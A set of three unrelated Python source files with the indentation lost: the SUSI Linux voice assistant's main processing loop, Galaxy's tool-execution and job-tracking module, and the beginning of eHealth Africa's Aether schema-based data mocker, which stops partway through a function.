susi_loop.py
|
"""
Processing logic of susi_linux
"""
import time
import os
import re
import logging
import queue
from threading import Thread, Timer, current_thread
from datetime import datetime
from urllib.parse import urljoin
import speech_recognition as sr
import requests
import json_config
import speech_recognition
from speech_recognition import Recognizer, Microphone
# from requests.exceptions import ConnectionError
import susi_python as susi
from .hardware_components.lights import lights
from .internet_test import internet_on
from .action_scheduler import ActionScheduler
from .player import player
from susi_config import SusiConfig
from .speech import TTS
logger = logging.getLogger(__name__)
try:
import RPi.GPIO as GPIO
except ImportError:
logger.warning("This device doesn't have GPIO port")
GPIO = None
class SusiLoop():
"""The main SUSI loop dealing with hotword detection, voice recognition,
server communication, action processing, etc"""
def __init__(self, renderer=None):
if GPIO:
try:
GPIO.setmode(GPIO.BCM)
GPIO.setup(27, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
except RuntimeError as e:
logger.error(e)
thread1 = Thread(target=self.server_checker, name="ServerCheckerThread")
thread1.daemon = True
thread1.start()
recognizer = Recognizer()
# this was False in the old state machine, but reading the API docs
# https://github.com/Uberi/speech_recognition/blob/master/reference/library-reference.rst
# it seems that True is actually better!
recognizer.dynamic_energy_threshold = True
recognizer.energy_threshold = 2000
self.recognizer = recognizer
self.susi = susi
self.renderer = renderer
self.server_url = "https://127.0.0.1:4000"
self.action_schduler = ActionScheduler()
self.action_schduler.start()
self.event_queue = queue.Queue()
self.idle = True
self.supported_languages = None
try:
res = requests.get('http://ip-api.com/json').json()
self.susi.update_location(
longitude=res['lon'], latitude=res['lat'],
country_name=res['country'], country_code=res['countryCode'])
except ConnectionError as e:
logger.error(e)
self.susi_config = SusiConfig()
self.path_base = self.susi_config.get('path.base')
self.sound_detection = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.detection')))
self.sound_problem = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.problem')))
self.sound_error_recognition = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.error.recognition')))
self.sound_error_timeout = os.path.abspath(
os.path.join(self.path_base,
self.susi_config.get('path.sound.error.timeout')))
if self.susi_config.get('susi.mode') == 'authenticated':
try:
susi.sign_in(email=self.susi_config.get('susi.user'),
password=self.susi_config.get('susi.pass'))
except Exception as e:
logger.error('Some error occurred in login. Check you login details with susi-config.\n%s', e)
if self.susi_config.get('hotword.engine') == 'Snowboy':
from .hotword_engine.snowboy_detector import SnowboyDetector
hotword_model = "susi.pmdl"
if self.susi_config.get('hotword.model'):
logger.debug("Using configured hotword model: " + self.susi_config.get('hotword.model'))
hotword_model = self.susi_config.get('hotword_model')
self.hotword_detector = SnowboyDetector(model=hotword_model)
elif self.susi_config.get('hotword.engine') == 'PocketSphinx':
from .hotword_engine.sphinx_detector import PocketSphinxDetector
self.hotword_detector = PocketSphinxDetector()
elif self.susi_config.get('hotword.engine') == 'None':
self.hotword_detector = None
else:
raise ValueError(f"Unrecognized value for hotword.engine: {self.susi_config.get('hotword.engine')}")
if self.susi_config.get('wakebutton') == 'enabled':
logger.info("Susi has the wake button enabled")
if self.susi_config.get('device') == 'RaspberryPi':
logger.info("Susi runs on a RaspberryPi")
from .hardware_components.rpi_wake_button import RaspberryPiWakeButton
self.wake_button = RaspberryPiWakeButton()
else:
logger.warning("Susi is not running on a RaspberryPi")
self.wake_button = None
else:
logger.warning("Susi has the wake button disabled")
self.wake_button = None
stt = self.susi_config.get('stt')
if stt == 'google' or stt == 'watson' or stt == 'bing':
# for internet based services we assume any language supported
self.supported_languages = None
elif stt == 'pocketsphinx':
ps_data_dir = os.path.join(os.path.dirname(os.path.realpath(speech_recognition.__file__)), "pocketsphinx-data")
self.supported_languages = [ f.name for f in os.scandir(ps_data_dir) if f.is_dir() ]
logger.debug(f"Found supported languages for PocketSphinx: {self.supported_languages}")
elif stt == 'deepspeech-local':
ps_data_dir = os.path.join(os.path.dirname(os.path.realpath(speech_recognition.__file__)), "deepspeech-data")
self.supported_languages = [ f.name for f in os.scandir(ps_data_dir) if f.is_dir() ]
logger.debug(f"Found supported languages for DeepSpeech: {self.supported_languages}")
else:
self.supported_languages = None
logger.warn(f"Unknown stt setting: {stt}")
if self.susi_config.get('stt') == 'deepspeech-local':
self.microphone = Microphone(sample_rate=16000)
else:
self.microphone = Microphone()
if self.hotword_detector is not None:
self.hotword_detector.subject.subscribe(
on_next=lambda x: self.hotword_detected_callback())
if self.wake_button is not None:
self.wake_button.subject.subscribe(
on_next=lambda x: self.hotword_detected_callback())
if self.renderer is not None:
self.renderer.subject.subscribe(
on_next=lambda x: self.hotword_detected_callback())
if self.action_schduler is not None:
self.action_schduler.subject.subscribe(
on_next=lambda x: self.queue_event(x))
def queue_event(self, event):
""" queue a delayed event"""
self.event_queue.put(event)
def hotword_listener(self):
""" thread function for listening to the hotword"""
# this function never returns ...
self.hotword_detector.start()
def server_checker(self):
""" thread function for checking the used server being alive"""
response_one = None
test_params = {
'q': 'Hello',
'timezoneOffset': int(time.timezone / 60)
}
while response_one is None:
try:
logger.debug("checking for local server")
url = urljoin(self.server_url, '/susi/chat.json')
response_one = requests.get(url, test_params).result()
api_endpoint = self.server_url
susi.use_api_endpoint(api_endpoint)
except AttributeError:
time.sleep(10)
continue
except ConnectionError:
time.sleep(10)
continue
def start(self, background = False):
""" start processing of audio events """
if self.hotword_detector is not None:
hotword_thread = Thread(target=self.hotword_listener, name="HotwordDetectorThread")
hotword_thread.daemon = True
hotword_thread.start()
if background:
queue_loop_thread = Thread(target=self.queue_loop, name="QueueLoopThread")
queue_loop_thread.daemon = True
queue_loop_thread.start()
else:
self.queue_loop()
def queue_loop(self):
while True:
# block until events are available
ev = self.event_queue.get(block = True)
logger.debug("Got event from event queue, trying to deal with it")
# wait until idle
while True:
logger.debug("Waiting to become idle for planned action")
if not self.idle:
time.sleep(1)
continue
logger.debug("We are idle now ...")
self.idle = False
self.deal_with_answer(ev)
# back from processing
player.restore_softvolume()
if GPIO:
try:
GPIO.output(27, False)
GPIO.output(22, False)
except RuntimeError:
pass
self.idle = True
break
def notify_renderer(self, message, payload=None):
""" notify program renderer """
if self.renderer is not None:
self.renderer.receive_message(message, payload)
def hotword_detected_callback(self):
"""
Callback when the hotword is detected. Does the full processing
logic formerly contained in different states
"""
logger.debug("Entering hotword callback")
# don't do anything if we are already busy
if not self.idle:
logger.debug("Callback called while already busy, returning immediately from callback")
return
logger.debug("We are idle, so work on it!")
self.idle = False
# beep
player.beep(self.sound_detection)
if GPIO:
GPIO.output(22, True)
audio = None
logger.debug("notify renderer for listening")
self.notify_renderer('listening')
with self.microphone as source:
try:
logger.debug("listening to voice command")
audio = self.recognizer.listen(source, timeout=10.0, phrase_time_limit=5)
except sr.WaitTimeoutError:
logger.debug("timeout reached waiting for voice command")
self.deal_with_error('ListenTimeout')
logger.debug("delaying idle setting for 0.05s")
Timer(interval=0.05, function=self.set_idle).start()
return
if GPIO:
GPIO.output(22, False)
lights.off()
lights.think()
try:
logger.debug("Converting audio to text")
value = self.recognize_audio(audio=audio, recognizer=self.recognizer)
logger.debug("recognize_audio => %s", value)
self.notify_renderer('recognized', value)
if self.deal_with_answer(value):
pass
else:
logger.error("Error dealing with answer")
except sr.UnknownValueError as e:
logger.error("UnknownValueError from SpeechRecognition: %s", e)
self.deal_with_error('RecognitionError')
logger.debug("delaying idle setting for 0.05s")
Timer(interval=0.05, function=self.set_idle).start()
return
def set_idle(self):
logger.debug("Switching to idle mode")
self.notify_renderer('idle')
self.idle = True
def __speak(self, text):
"""Method to set the default TTS for the Speaker"""
tts = self.susi_config.get('tts')
if tts == 'google':
TTS.speak_google_tts(text)
elif tts == 'flite':
logger.info("Using flite for TTS") # indication for using an offline music player
TTS.speak_flite_tts(text)
elif tts == 'watson':
TTS.speak_watson_tts(text)
else:
raise ValueError("unknown key for tts", tts)
def recognize_audio(self, recognizer, audio):
"""Use the configured STT method to convert spoken audio to text"""
stt = self.susi_config.get('stt')
lang = self.susi_config.get('language')
# Try to adjust language to what is available
# None indicates any language supported, so use it as is
if self.supported_languages is not None:
if len(self.supported_languages) == 0:
raise ValueError(f"No supported language for the current STT {stt}")
if "en-US" in self.supported_languages:
default = "en-US"
else:
default = self.supported_languages[0]
if lang not in self.supported_languages:
if len(lang) < 2:
logger.warn(f"Unsupported language code {lang}, using {default}")
lang = default
else:
langshort = lang[0:2].lower()
for l in self.supported_languages:
if langshort == l[0:2].lower():
logger.debug(f"Using language code {l} instead of {lang}")
lang = l
break
# We should now have a proper language code in lang, if not, warn and reset
if lang not in self.supported_languages:
logger.warn(f"Unsupported langauge code {lang}, using {default}")
lang = default
logger.info("Trying to recognize audio with %s in language: %s", stt, lang)
if stt == 'google':
return recognizer.recognize_google(audio, language=lang)
elif stt == 'watson':
username = self.susi_config.get('watson.stt.user')
password = self.susi_config.get('watson.stt.pass')
return recognizer.recognize_ibm(
username=username, password=password, language=lang, audio_data=audio)
elif stt == 'pocket_sphinx':
return recognizer.recognize_sphinx(audio, language=lang)
elif stt == 'bing':
api_key = self.susi_config.get('bing.api')
return recognizer.recognize_bing(audio_data=audio, key=api_key, language=lang)
elif stt == 'deepspeech-local':
return recognizer.recognize_deepspeech(audio, language=lang)
else:
logger.error(f"Unknown STT setting: {stt}")
logger.error("Using DeepSpeech!")
return recognizer.recognize_deepspeech(audio, language=lang)
def deal_with_error(self, payload=None):
"""deal with errors happening during processing of audio events"""
if payload == 'RecognitionError':
logger.debug("ErrorState Recognition Error")
self.notify_renderer('error', 'recognition')
lights.speak()
player.say(self.sound_error_recognition)
lights.off()
elif payload == 'ConnectionError':
self.notify_renderer('error', 'connection')
self.susi_config.set('tts', 'flite')
self.susi_config.set('stt', 'pocketsphinx')
print("Internet Connection not available")
lights.speak()
lights.off()
logger.info("Changed to offline providers")
elif payload == 'ListenTimeout':
self.notify_renderer('error', 'timeout')
lights.speak()
player.say(self.sound_error_timeout)
lights.off()
else:
print("Error: {} \n".format(payload))
self.notify_renderer('error')
lights.speak()
player.say(self.sound_problem)
lights.off()
def deal_with_answer(self, payload=None):
"""processing logic - how to deal with answers from the server"""
try:
no_answer_needed = False
if isinstance(payload, str):
logger.debug("Sending payload to susi server: %s", payload)
reply = self.susi.ask(payload)
else:
logger.debug("Executing planned action response: %s", payload)
reply = payload
if GPIO:
GPIO.output(27, True)
self.notify_renderer('speaking', payload={'susi_reply': reply})
if 'planned_actions' in reply.keys():
logger.debug("planning action: ")
for plan in reply['planned_actions']:
logger.debug("plan = " + str(plan))
# plan answers look like this:
# plan = {'planned_actions': [{'language': 'en', 'answer': 'ALARM', 'plan_delay': 300001,
# 'plan_date': '2020-01-09T02:05:10.377Z'}], 'language': 'en', 'answer': 'alarm set for in 5 minutes'}
# we use time.time as timefunc for scheduler, so we need to convert the
# delay and absolute time to the same format, that is float of sec since epoch
# Unfortunately, Python is tooooooo stupid to provide ISO standard confirm standard
# library. datetime.fromisoformat sounds like perfectly made, only that it doesn't
# parse the Z postfix, congratulations.
# https://discuss.python.org/t/parse-z-timezone-suffix-in-datetime/2220
# Replace it manually with +00:00
# We send both the delay and absolute time in case one of the two is missing
# the scheduler prefers the delay value
plan_date_sec = datetime.fromisoformat(re.sub('Z$', '+00:00', plan['plan_date'])).timestamp()
self.action_schduler.add_event(int(plan['plan_delay']) / 1000, plan_date_sec, plan)
# first responses WITHOUT answer key!
# {'answer': 'Audio volume is now 10 percent.', 'volume': '10'}
if 'volume' in reply.keys():
no_answer_needed = True
player.volume(reply['volume'])
player.say(self.sound_detection)
if 'media_action' in reply.keys():
action = reply['media_action']
if action == 'pause':
no_answer_needed = True
player.pause()
lights.off()
lights.wakeup()
elif action == 'resume':
no_answer_needed = True
player.resume()
elif action == 'restart':
no_answer_needed = True
player.restart()
elif action == 'next':
no_answer_needed = True
player.next()
elif action == 'previous':
no_answer_needed = True
player.previous()
elif action == 'shuffle':
no_answer_needed = True
player.shuffle()
else:
logger.error('Unknown media action: %s', action)
# {'stop': <susi_python.models.StopAction object at 0x7f4641598d30>}
if 'stop' in reply.keys():
no_answer_needed = True
player.stop()
if 'answer' in reply.keys():
logger.info('Susi: %s', reply['answer'])
lights.off()
lights.speak()
self.__speak(reply['answer'])
lights.off()
else:
if not no_answer_needed and 'identifier' not in reply.keys():
lights.off()
lights.speak()
self.__speak("I don't have an answer to this")
lights.off()
if 'language' in reply.keys():
answer_lang = reply['language']
if answer_lang != self.susi_config.get("language"):
logger.info("Switching language to: %s", answer_lang)
# switch language
self.susi_config.set('language', answer_lang)
# answer to "play ..."
# {'identifier': 'ytd-04854XqcfCY', 'answer': 'Playing Queen - We Are The Champions (Official Video)'}
if 'identifier' in reply.keys():
url = reply['identifier']
logger.debug("Playing " + url)
if url[:3] == 'ytd':
player.playytb(url[4:])
else:
player.play(url)
if 'table' in reply.keys():
table = reply['table']
for h in table.head:
print('%s\t' % h, end='')
self.__speak(h)
print()
for datum in table.data[0:4]:
for value in datum:
print('%s\t' % value, end='')
self.__speak(value)
print()
if 'rss' in reply.keys():
rss = reply['rss']
entities = rss['entities']
count = rss['count']
for entity in entities[0:count]:
logger.debug(entity.title)
self.__speak(entity.title)
except ConnectionError:
self.deal_with_error('ConnectionError')
return False
except Exception as e:
logger.error('Unknown error: %s', e)
return False
return True
|
execute.py
|
"""
Once state information has been calculated, handle actually executing tools
from various states, tracking results, and building implicit dataset
collections from matched collections.
"""
import collections
import logging
from threading import Thread
import six
import six.moves
from six.moves.queue import Queue
from galaxy import model
from galaxy.dataset_collections.structure import get_structure, tool_output_to_structure
from galaxy.tools.actions import filter_output, on_text_for_names, ToolExecutionCache
from galaxy.tools.parser import ToolOutputCollectionPart
from galaxy.util import ExecutionTimer
log = logging.getLogger(__name__)
EXECUTION_SUCCESS_MESSAGE = "Tool [%s] created job [%s] %s"
class PartialJobExecution(Exception):
def __init__(self, execution_tracker):
self.execution_tracker = execution_tracker
MappingParameters = collections.namedtuple("MappingParameters", ["param_template", "param_combinations"])
def execute(trans, tool, mapping_params, history, rerun_remap_job_id=None, collection_info=None, workflow_invocation_uuid=None, invocation_step=None, max_num_jobs=None, job_callback=None, completed_jobs=None, workflow_resource_parameters=None):
"""
Execute a tool and return object containing summary (output data, number of
failures, etc...).
"""
if max_num_jobs:
assert invocation_step is not None
if rerun_remap_job_id:
assert invocation_step is None
all_jobs_timer = ExecutionTimer()
if invocation_step is None:
execution_tracker = ToolExecutionTracker(trans, tool, mapping_params, collection_info)
else:
execution_tracker = WorkflowStepExecutionTracker(trans, tool, mapping_params, collection_info, invocation_step, job_callback=job_callback)
app = trans.app
execution_cache = ToolExecutionCache(trans)
def execute_single_job(execution_slice, completed_job):
job_timer = ExecutionTimer()
params = execution_slice.param_combination
if workflow_invocation_uuid:
params['__workflow_invocation_uuid__'] = workflow_invocation_uuid
elif '__workflow_invocation_uuid__' in params:
# Only workflow invocation code gets to set this, ignore user supplied
# values or rerun parameters.
del params['__workflow_invocation_uuid__']
if workflow_resource_parameters:
params['__workflow_resource_params__'] = workflow_resource_parameters
elif '__workflow_resource_params__' in params:
# Only workflow invocation code gets to set this, ignore user supplied
# values or rerun parameters.
del params['__workflow_resource_params__']
job, result = tool.handle_single_execution(trans, rerun_remap_job_id, execution_slice, history, execution_cache, completed_job)
if job:
message = EXECUTION_SUCCESS_MESSAGE % (tool.id, job.id, job_timer)
log.debug(message)
execution_tracker.record_success(execution_slice, job, result)
else:
execution_tracker.record_error(result)
tool_action = tool.tool_action
if hasattr(tool_action, "check_inputs_ready"):
for params in execution_tracker.param_combinations:
# This will throw an exception if the tool is not ready.
tool_action.check_inputs_ready(
tool,
trans,
params,
history
)
execution_tracker.ensure_implicit_collections_populated(history, mapping_params.param_template)
config = app.config
burst_at = getattr(config, 'tool_submission_burst_at', 10)
burst_threads = getattr(config, 'tool_submission_burst_threads', 1)
job_count = len(execution_tracker.param_combinations)
jobs_executed = 0
has_remaining_jobs = False
if (job_count < burst_at or burst_threads < 2):
for i, execution_slice in enumerate(execution_tracker.new_execution_slices()):
if max_num_jobs and jobs_executed >= max_num_jobs:
has_remaining_jobs = True
break
else:
execute_single_job(execution_slice, completed_jobs[i])
else:
# TODO: re-record success...
q = Queue()
def worker():
while True:
params = q.get()
execute_single_job(params)
q.task_done()
for i in range(burst_threads):
t = Thread(target=worker)
t.daemon = True
t.start()
for i, execution_slice in enumerate(execution_tracker.new_execution_slices()):
if max_num_jobs and jobs_executed >= max_num_jobs:
has_remaining_jobs = True
break
else:
q.put(execution_slice, completed_jobs[i])
jobs_executed += 1
q.join()
if has_remaining_jobs:
raise PartialJobExecution(execution_tracker)
else:
execution_tracker.finalize_dataset_collections(trans)
log.debug("Executed %d job(s) for tool %s request: %s" % (job_count, tool.id, all_jobs_timer))
return execution_tracker
class ExecutionSlice(object):
def __init__(self, job_index, param_combination, dataset_collection_elements=None):
self.job_index = job_index
self.param_combination = param_combination
self.dataset_collection_elements = dataset_collection_elements
class ExecutionTracker(object):
def __init__(self, trans, tool, mapping_params, collection_info):
# Known ahead of time...
self.trans = trans
self.tool = tool
self.mapping_params = mapping_params
self.collection_info = collection_info
self._on_text = None
# Populated as we go...
self.failed_jobs = 0
self.execution_errors = []
self.successful_jobs = []
self.output_datasets = []
self.output_collections = []
self.implicit_collections = collections.OrderedDict()
@property
def param_combinations(self):
return self.mapping_params.param_combinations
@property
def example_params(self):
if self.mapping_params.param_combinations:
return self.mapping_params.param_combinations[0]
else:
# TODO: This isn't quite right - what we want is something like param_template wrapped,
# need a test case with an output filter applied to an empty list, still this is
# an improvement over not allowing mapping of empty lists.
return self.mapping_params.param_template
@property
def job_count(self):
return len(self.param_combinations)
def record_error(self, error):
self.failed_jobs += 1
message = "There was a failure executing a job for tool [%s] - %s"
log.warning(message, self.tool.id, error)
self.execution_errors.append(error)
@property
def on_text(self):
if self._on_text is None:
collection_names = ["collection %d" % c.hid for c in self.collection_info.collections.values()]
self._on_text = on_text_for_names(collection_names)
return self._on_text
def output_name(self, trans, history, params, output):
on_text = self.on_text
try:
output_collection_name = self.tool.tool_action.get_output_name(
output,
dataset=None,
tool=self.tool,
on_text=on_text,
trans=trans,
history=history,
params=params,
incoming=None,
job_params=None,
)
except Exception:
output_collection_name = "%s across %s" % (self.tool.name, on_text)
return output_collection_name
def sliced_input_collection_structure(self, input_name):
unqualified_recurse = self.tool.profile < 18.09 and "|" not in input_name
def find_collection(input_dict, input_name):
for key, value in input_dict.items():
if key == input_name:
return value
if isinstance(value, dict):
if "|" in input_name:
prefix, rest_input_name = input_name.split("|", 1)
if key == prefix:
return find_collection(value, rest_input_name)
elif unqualified_recurse:
# Looking for "input1" instead of "cond|input1" for instance.
# See discussion on https://github.com/galaxyproject/galaxy/issues/6157.
unqualified_match = find_collection(value, input_name)
if unqualified_match:
return unqualified_match
input_collection = find_collection(self.example_params, input_name)
if input_collection is None:
raise Exception("Failed to find referenced collection in inputs.")
if not hasattr(input_collection, "collection"):
raise Exception("Referenced input parameter is not a collection.")
collection_type_description = self.trans.app.dataset_collections_service.collection_type_descriptions.for_collection_type(input_collection.collection.collection_type)
subcollection_mapping_type = None
if self.is_implicit_input(input_name):
subcollection_mapping_type = self.collection_info.subcollection_mapping_type(input_name)
return get_structure(input_collection, collection_type_description, leaf_subcollection_type=subcollection_mapping_type)
def _structure_for_output(self, trans, tool_output):
structure = self.collection_info.structure
if hasattr(tool_output, "default_identifier_source"):
# Switch the structure for outputs if the output specified a default_identifier_source
collection_type_descriptions = trans.app.dataset_collections_service.collection_type_descriptions
source_collection = self.collection_info.collections.get(tool_output.default_identifier_source)
if source_collection:
collection_type_description = collection_type_descriptions.for_collection_type(source_collection.collection.collection_type)
_structure = structure.for_dataset_collection(source_collection.collection, collection_type_description=collection_type_description)
if structure.can_match(_structure):
structure = _structure
return structure
def _mapped_output_structure(self, trans, tool_output):
collections_manager = trans.app.dataset_collections_service
output_structure = tool_output_to_structure(self.sliced_input_collection_structure, tool_output, collections_manager)
# self.collection_info.structure - the mapping structure with default_identifier_source
# used to determine the identifiers to use.
mapping_structure = self._structure_for_output(trans, tool_output)
# Output structure may not be known, but input structure must be,
# otherwise this step of the workflow shouldn't have been scheduled
# or the tool should not have been executable on this input.
mapped_output_structure = mapping_structure.multiply(output_structure)
return mapped_output_structure
def ensure_implicit_collections_populated(self, history, params):
if not self.collection_info:
return
history = history or self.tool.get_default_history_by_trans(self.trans)
# params = param_combinations[0] if param_combinations else mapping_params.param_template
self.precreate_output_collections(history, params)
def precreate_output_collections(self, history, params):
# params is just one sample tool param execution with parallelized
# collection replaced with a specific dataset. Need to replace this
# with the collection and wrap everything up so can evaluate output
# label.
trans = self.trans
params.update(self.collection_info.collections) # Replace datasets with source collections for labelling outputs.
collection_instances = {}
implicit_inputs = self.implicit_inputs
implicit_collection_jobs = model.ImplicitCollectionJobs()
for output_name, output in self.tool.outputs.items():
if filter_output(output, self.example_params):
continue
output_collection_name = self.output_name(trans, history, params, output)
effective_structure = self._mapped_output_structure(trans, output)
collection_instance = trans.app.dataset_collections_service.precreate_dataset_collection_instance(
trans=trans,
parent=history,
name=output_collection_name,
structure=effective_structure,
implicit_inputs=implicit_inputs,
implicit_output_name=output_name,
)
collection_instance.implicit_collection_jobs = implicit_collection_jobs
collection_instances[output_name] = collection_instance
trans.sa_session.add(collection_instance)
# Needed to flush the association created just above with
# job.add_output_dataset_collection.
trans.sa_session.flush()
self.implicit_collections = collection_instances
@property
def implicit_collection_jobs(self):
# TODO: refactor to track this properly maybe?
if self.implicit_collections:
return six.next(six.itervalues(self.implicit_collections)).implicit_collection_jobs
else:
return None
def finalize_dataset_collections(self, trans):
# TODO: this probably needs to be reworked some, we should have the collection methods
# return a list of changed objects to add to the session and flush and we should only
# be finalizing collections to a depth of self.collection_info.structure. So for instance
# if you are mapping a list over a tool that dynamically generates lists - we won't actually
# know the structure of the inner list until after its job is complete.
if self.failed_jobs > 0:
for i, implicit_collection in enumerate(self.implicit_collections.values()):
if i == 0:
implicit_collection_jobs = implicit_collection.implicit_collection_jobs
implicit_collection_jobs.populated_state = "failed"
trans.sa_session.add(implicit_collection_jobs)
implicit_collection.collection.handle_population_failed("One or more jobs failed during dataset initialization.")
trans.sa_session.add(implicit_collection.collection)
else:
for i, implicit_collection in enumerate(self.implicit_collections.values()):
if i == 0:
implicit_collection_jobs = implicit_collection.implicit_collection_jobs
implicit_collection_jobs.populated_state = "ok"
trans.sa_session.add(implicit_collection_jobs)
implicit_collection.collection.finalize()
trans.sa_session.add(implicit_collection.collection)
trans.sa_session.flush()
@property
def implicit_inputs(self):
implicit_inputs = list(self.collection_info.collections.items())
return implicit_inputs
def is_implicit_input(self, input_name):
return input_name in self.collection_info.collections
def walk_implicit_collections(self):
return self.collection_info.structure.walk_collections(self.implicit_collections)
def new_execution_slices(self):
if self.collection_info is None:
for job_index, param_combination in enumerate(self.param_combinations):
yield ExecutionSlice(job_index, param_combination)
else:
for execution_slice in self.new_collection_execution_slices():
yield execution_slice
def record_success(self, execution_slice, job, outputs):
# TODO: successful_jobs need to be inserted in the correct place...
self.successful_jobs.append(job)
self.output_datasets.extend(outputs)
for job_output in job.output_dataset_collection_instances:
self.output_collections.append((job_output.name, job_output.dataset_collection_instance))
if self.implicit_collections:
implicit_collection_jobs = None
for output_name, collection_instance in self.implicit_collections.items():
job.add_output_dataset_collection(output_name, collection_instance)
if implicit_collection_jobs is None:
implicit_collection_jobs = collection_instance.implicit_collection_jobs
job_assoc = model.ImplicitCollectionJobsJobAssociation()
job_assoc.order_index = execution_slice.job_index
job_assoc.implicit_collection_jobs = implicit_collection_jobs
job_assoc.job_id = job.id
self.trans.sa_session.add(job_assoc)
# Seperate these because workflows need to track their jobs belong to the invocation
# in the database immediately and they can be recovered.
class ToolExecutionTracker(ExecutionTracker):
def __init__(self, trans, tool, mapping_params, collection_info):
super(ToolExecutionTracker, self).__init__(trans, tool, mapping_params, collection_info)
# New to track these things for tool output API response in the tool case,
# in the workflow case we just write stuff to the database and forget about
# it.
self.outputs_by_output_name = collections.defaultdict(list)
def record_success(self, execution_slice, job, outputs):
super(ToolExecutionTracker, self).record_success(execution_slice, job, outputs)
for output_name, output_dataset in outputs:
if ToolOutputCollectionPart.is_named_collection_part_name(output_name):
# Skip known collection outputs, these will be covered by
# output collections.
continue
self.outputs_by_output_name[output_name].append(output_dataset)
for job_output in job.output_dataset_collections:
self.outputs_by_output_name[job_output.name].append(job_output.dataset_collection)
def new_collection_execution_slices(self):
for job_index, (param_combination, dataset_collection_elements) in enumerate(six.moves.zip(self.param_combinations, self.walk_implicit_collections())):
for dataset_collection_element in dataset_collection_elements.values():
assert dataset_collection_element.element_object is None
yield ExecutionSlice(job_index, param_combination, dataset_collection_elements)
class WorkflowStepExecutionTracker(ExecutionTracker):
def __init__(self, trans, tool, mapping_params, collection_info, invocation_step, job_callback):
super(WorkflowStepExecutionTracker, self).__init__(trans, tool, mapping_params, collection_info)
self.invocation_step = invocation_step
self.job_callback = job_callback
def record_success(self, execution_slice, job, outputs):
super(WorkflowStepExecutionTracker, self).record_success(execution_slice, job, outputs)
if self.collection_info:
self.invocation_step.implicit_collection_jobs = self.implicit_collection_jobs
else:
self.invocation_step.job = job
self.job_callback(job)
def new_collection_execution_slices(self):
for job_index, (param_combination, dataset_collection_elements) in enumerate(six.moves.zip(self.param_combinations, self.walk_implicit_collections())):
# Two options here - check if the element has been populated or check if the
# a WorkflowInvocationStepJobAssociation exists. Not sure which is better but
# for now I have the first so lets check.
found_result = False
for dataset_collection_element in dataset_collection_elements.values():
if dataset_collection_element.element_object is not None:
found_result = True
break
if found_result:
continue
yield ExecutionSlice(job_index, param_combination, dataset_collection_elements)
def ensure_implicit_collections_populated(self, history, params):
if not self.collection_info:
return
history = history or self.tool.get_default_history_by_trans(self.trans)
if self.invocation_step.is_new:
self.precreate_output_collections(history, params)
else:
collections = {}
for output_assoc in self.invocation_step.output_dataset_collections:
implicit_collection = output_assoc.dataset_collection
assert hasattr(implicit_collection, "history_content_type") # make sure it is an HDCA and not a DC
collections[output_assoc.output_name] = output_assoc.dataset_collection
self.implicit_collections = collections
__all__ = ('execute', )
|
mocker.py
|
# Copyright (C) 2018 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import collections
from collections import namedtuple
import json
import logging
from queue import Queue, Empty
import os
from random import randint, uniform, choice, sample
import signal
import string
from threading import Thread
from time import sleep
from uuid import uuid4
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
from aether.client import Client, AetherAPIException
class Generic(object):
'''
We keep our default mocking functions for each type here as generic
'''
@staticmethod
def boolean():
return choice([True, False])
@staticmethod
def float():
return uniform(.01, 1000.00)
@staticmethod
def int():
return randint(1, 99999)
@staticmethod
def null():
return None
@staticmethod
def string():
size = choice(range(3, 12))
return "".join(sample(string.ascii_lowercase, size))
@staticmethod
def uuid():
return str(uuid4())
@staticmethod
def geo_lat():
return uniform(0.00000000000, 60.00000000000)
@staticmethod
def geo_lng():
return uniform(0.00000000000, 180.00000000000)
class DataMocker(object):
'''
An extensible tool that consumes an Avro Schema and creates junk data that matches it.
Data generation methods can be overridden on a per type [text, int, etc] basis via:
override_type(type_name, fn)
Override methods can also be passed on a property name basis [lat, lon, name] via:
override_property(property_name, fn)
'''
def __init__(self, name, schema, parent):
self.MAX_ARRAY_SIZE = 4
self.QUEUE_WORKERS = 10
self.REUSE_COEFFICIENT = 0.85
self.name = name
self.raw_schema = schema
self.parent = parent
self.subschema = {}
self.primative_types = [
"null",
"boolean",
"int",
"long",
"float",
"double",
"bytes",
"string"
]
self.type_methods = {
primative: MockFn(self._default(primative))
for primative in self.primative_types
}
self.created = [] # ids of created entities
self.reuse = 0 # number of recycled entity ids
self.count = 0 # number of entity references to this type
self.property_methods = {}
self.required = []
self.ignored_properties = []
self.restricted_types = {}
self.instructions = {}
self.killed = False
self._queue = Queue()
self.__start_queue_process()
self.override_property("id", MockFn(Generic.uuid))
self.load()
def _default(self, primative):
if primative in ["int", "long"]:
return Generic.int
if primative in ["float", "double"]:
return Generic.float
if primative is "null":
return Generic.null
if primative is "string":
return Generic.string
if primative is "boolean":
return Generic.boolean
def kill(self):
self.killed = True
def __start_queue_process(self):
for x in range(self.QUEUE_WORKERS):
worker = Thread(target=self.__reference_runner, args=[])
worker.daemon = False
worker.start()
def __reference_runner(self):
while True:
if self.killed:
break
try:
fn = self._queue.get(block=True, timeout=1)
fn()
except Empty as emp:
if self.killed:
break
sleep(1)
except Exception as err:
raise err
def get_reference(self, exclude=None):
# called from other types to generate this one (lazily)
# returns an ID, either of by registering a new instance
# or by returning a value from created
self.count += 1
thresh = 0 if self.count <= 100 else (100 * self.REUSE_COEFFICIENT)
new = (randint(0, 100) >= thresh)
if new:
_id = self.quick_reference()
else:
items = self.created[:-4]
if items:
self.reuse += 1
_id = choice(items)
else:
_id = self.quick_reference()
return _id
def quick_reference(self):
# generates an id for this type
# queues a job to actually make the instance
_id = None
if self.property_methods.get('id'):
fn = self.property_methods.get('id')
_id = fn()
else:
fn = [fn for name, fn in self.instuctions.get(
self.name) if name == 'id']
if not fn:
raise ValueError("Couldn't find id function")
_id = fn[0]()
deffered_generation = MockFn(self.fullfill_reference, [_id])
self._queue.put(deffered_generation)
return _id
def fullfill_reference(self, _id):
# the method called from the queue to create an instance
